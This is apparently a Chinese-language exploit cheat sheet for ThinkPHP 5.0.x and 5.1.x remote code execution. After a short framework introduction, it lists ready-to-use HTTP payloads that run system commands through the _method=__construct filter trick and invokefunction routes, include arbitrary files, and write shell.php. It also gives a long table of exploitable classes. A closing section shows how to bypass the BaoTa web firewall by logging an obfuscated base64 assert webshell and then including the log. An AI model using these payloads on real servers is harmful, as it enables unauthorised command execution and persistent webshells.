ThinkPHP简介

ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架，诞生于2006年初，原名FCS，2007年元旦正式更名为ThinkPHP，遵循Apache2开源协议发布，从Struts结构移植过来并做了改进和完善，同时也借鉴了国外很多优秀的框架和模式，使用面向对象的开发结构和MVC模式，融合了Struts的思想和TagLib（标签库）、RoR的ORM映射和ActiveRecord模式。

ThinkPHP 漏洞

ThinkPHP命令执行

ThinkPHP 代码执行1

>影响版本：5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30

漏洞利用Exp：

# ThinkPHP <= 5.0.13
POST /?s=index/index
s=whoami&_method=__construct&method=&filter[]=system
# ThinkPHP <= 5.0.23、5.1.0 <= 5.1.16 需要开启框架app_debug
POST /
_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls -al
# ThinkPHP <= 5.0.23 需要存在xxx的method路由，例如captcha
POST /?s=xxx HTTP/1.1
_method=__construct&filter[]=system&method=get&get[]=ls+-al
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls
POST /index.php?s=captcha HTTP/1.1
_method=__construct&filter[]=system&method=get&get[]=ls+-al
# 或者
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls

ThinkPHP 代码执行2

5.0.x

?s=index/think\config/get&name=database.username # 获取配置信息
?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件
?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

5.1.x

?s=index/\think\Request/input&filter[]=system&data=pwd
?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

ThinkPHP 代码执行可利用类

ThinkPHP5.1.x	ThinkPHP5.0.x
stdClass	stdClass
Exception	Exception
ErrorException	ErrorException
Closure	Closure
Generator	Generator
DateTime	DateTime
DateTimeImmutable	DateTimeImmutable
DateTimeZone	DateTimeZone
DateInterval	DateInterval
DatePeriod	DatePeriod
LibXMLError	LibXMLError
DOMException	DOMException
DOMStringList	DOMStringList
DOMNameList	DOMNameList
DOMImplementationList	DOMImplementationList
DOMImplementationSource	DOMImplementationSource
DOMImplementation	DOMImplementation
DOMNode	DOMNode
DOMNameSpaceNode	DOMNameSpaceNode
DOMDocumentFragment	DOMDocumentFragment
DOMDocument	DOMDocument
DOMNodeList	DOMNodeList
DOMNamedNodeMap	DOMNamedNodeMap
DOMCharacterData	DOMCharacterData
DOMAttr	DOMAttr
DOMElement	DOMElement
DOMText	DOMText
DOMComment	DOMComment
DOMTypeinfo	DOMTypeinfo
DOMUserDataHandler	DOMUserDataHandler
DOMDomError	DOMDomError
DOMErrorHandler	DOMErrorHandler
DOMLocator	DOMLocator
DOMConfiguration	DOMConfiguration
DOMCdataSection	DOMCdataSection
DOMDocumentType	DOMDocumentType
DOMNotation	DOMNotation
DOMEntity	DOMEntity
DOMEntityReference	DOMEntityReference
DOMProcessingInstruction	DOMProcessingInstruction
DOMStringExtend	DOMStringExtend
DOMXPath	DOMXPath
finfo	finfo
LogicException	LogicException
BadFunctionCallException	BadFunctionCallException
BadMethodCallException	BadMethodCallException
DomainException	DomainException
InvalidArgumentException	InvalidArgumentException
LengthException	LengthException
OutOfRangeException	OutOfRangeException
RuntimeException	RuntimeException
OutOfBoundsException	OutOfBoundsException
OverflowException	OverflowException
RangeException	RangeException
UnderflowException	UnderflowException
UnexpectedValueException	UnexpectedValueException
RecursiveIteratorIterator	RecursiveIteratorIterator
IteratorIterator	IteratorIterator
FilterIterator	FilterIterator
RecursiveFilterIterator	RecursiveFilterIterator
CallbackFilterIterator	CallbackFilterIterator
RecursiveCallbackFilterIterator	RecursiveCallbackFilterIterator
ParentIterator	ParentIterator
LimitIterator	LimitIterator
CachingIterator	CachingIterator
RecursiveCachingIterator	RecursiveCachingIterator
NoRewindIterator	NoRewindIterator
AppendIterator	AppendIterator
InfiniteIterator	InfiniteIterator
RegexIterator	RegexIterator
RecursiveRegexIterator	RecursiveRegexIterator
EmptyIterator	EmptyIterator
RecursiveTreeIterator	RecursiveTreeIterator
ArrayObject	ArrayObject
ArrayIterator	ArrayIterator
RecursiveArrayIterator	RecursiveArrayIterator
SplFileInfo	SplFileInfo
DirectoryIterator	DirectoryIterator
FilesystemIterator	FilesystemIterator
RecursiveDirectoryIterator	RecursiveDirectoryIterator
GlobIterator	GlobIterator
SplFileObject	SplFileObject
SplTempFileObject	SplTempFileObject
SplDoublyLinkedList	SplDoublyLinkedList
SplQueue	SplQueue
SplStack	SplStack
SplHeap	SplHeap
SplMinHeap	SplMinHeap
SplMaxHeap	SplMaxHeap
SplPriorityQueue	SplPriorityQueue
SplFixedArray	SplFixedArray
SplObjectStorage	SplObjectStorage
MultipleIterator	MultipleIterator
SessionHandler	SessionHandler
ReflectionException	ReflectionException
Reflection	Reflection
ReflectionFunctionAbstract	ReflectionFunctionAbstract
ReflectionFunction	ReflectionFunction
ReflectionParameter	ReflectionParameter
ReflectionMethod	ReflectionMethod
ReflectionClass	ReflectionClass
ReflectionObject	ReflectionObject
ReflectionProperty	ReflectionProperty
ReflectionExtension	ReflectionExtension
ReflectionZendExtension	ReflectionZendExtension
__PHP_Incomplete_Class	__PHP_Incomplete_Class
php_user_filter	php_user_filter
Directory	Directory
SimpleXMLElement	SimpleXMLElement
SimpleXMLIterator	SimpleXMLIterator
SoapClient	SoapClient
SoapVar	SoapVar
SoapServer	SoapServer
SoapFault	SoapFault
SoapParam	SoapParam
SoapHeader	SoapHeader
PharException	PharException
Phar	Phar
PharData	PharData
PharFileInfo	PharFileInfo
XMLReader	XMLReader
XMLWriter	XMLWriter
ZipArchive	ZipArchive
PDOException	PDOException
PDO	PDO
PDOStatement	PDOStatement
PDORow	PDORow
CURLFile	CURLFile
Collator	Collator
NumberFormatter	NumberFormatter
Normalizer	Normalizer
Locale	Locale
MessageFormatter	MessageFormatter
IntlDateFormatter	IntlDateFormatter
ResourceBundle	ResourceBundle
Transliterator	Transliterator
IntlTimeZone	IntlTimeZone
IntlCalendar	IntlCalendar
IntlGregorianCalendar	IntlGregorianCalendar
Spoofchecker	Spoofchecker
IntlException	IntlException
IntlIterator	IntlIterator
IntlBreakIterator	IntlBreakIterator
IntlRuleBasedBreakIterator	IntlRuleBasedBreakIterator
IntlCodePointBreakIterator	IntlCodePointBreakIterator
IntlPartsIterator	IntlPartsIterator
UConverter	UConverter
JsonIncrementalParser	JsonIncrementalParser
mysqli_sql_exception	mysqli_sql_exception
mysqli_driver	mysqli_driver
mysqli	mysqli
mysqli_warning	mysqli_warning
mysqli_result	mysqli_result
mysqli_stmt	mysqli_stmt
think\Loader	think\Loader
think\Error	think\Error
think\Container	think\Config
think\App	think\App
think\Env	think\Request
think\Config	think\Hook
think\Hook	think\Env
think\Facade	think\Lang
think\facade\Env	think\Log
env	think\Route
think\Db
think\Lang
think\Request
think\facade\Route
route
think\Route
think\route\Rule
think\route\RuleGroup
think\route\Domain
think\route\RuleItem
think\route\RuleName
think\route\Dispatch
think\route\dispatch\Url
think\route\dispatch\Module
think\Middleware
think\Cookie
think\View
think\view\driver\Think
think\Template
think\template\driver\File
think\Log
think\log\driver\File
think\Session
think\Debug
think\Cache
think\cache\Driver
think\cache\driver\File

ThinkPHP 5.0 .x 绕过宝塔

第一种—不拒绝POST数据包

/index.php?s=captcha

POST:_method=__construct&&filter[]=think__include_file&method=GET&GET[]=../runtime/log/202017.log

重点在于包含那个日志，所以生成错误日志方式：

必须Brupsuite抓包然后发送数据：

/index.php?s=captch&aaa=<?php $ant=base64_decode("YXNzZXJ0");$ant(base64_decode(${"_PO"."ST"}["sb"]));?>

POST:_method=__construct&&filter[]=system&method=GET&GET[]=whoami